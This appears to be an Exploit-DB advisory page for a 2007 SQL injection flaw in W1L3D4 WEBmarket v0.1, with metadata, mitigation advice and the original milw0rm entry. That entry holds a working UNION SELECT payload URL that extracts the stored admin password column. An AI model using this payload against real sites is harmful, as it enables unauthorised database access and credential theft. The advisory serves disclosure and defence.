W1L3D4 WEBmarket v0,1 SQL Injection Vuln

vendor:

W1L3D4 WEBmarket

by:

Crackers_Child

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: W1L3D4 WEBmarket

Affected Version From: v0.1

Affected Version To: v0.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

W1L3D4 WEBmarket v0,1 SQL Injection Vuln

The vulnerability exists in the urunbak.asp script of W1L3D4 WEBmarket v0.1. By manipulating the 'id' parameter in the URL, an attacker can perform SQL injection and retrieve sensitive information from the database. An example exploit URL is provided in the note section.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, using prepared statements or parameterized queries can help prevent SQL injection attacks.

Source

Exploit-DB raw data:

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Title    : W1L3D4 WEBmarket v0,1 SQL Injection Vuln

Author   : Crackers_Child

Contact  : cybermilitan@hotmail.com

Bug      : in urunbak.asp

Down     : http://www.aspdestek.net/uploads/20070518_092540_webmarket.rar
Site     :

Exploit  : http://site.com/script_path/urunbak.asp?id=25+union+select+0,1,parola,3,4,5,6+from+ayar

Note     : [ Aq Mahkemelik Oldk daha ne olsn :) (ci) ] [ cRA 2 Ay YOK sAhalarda]

www.dosyacek.com

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 

# milw0rm.com [2007-06-20]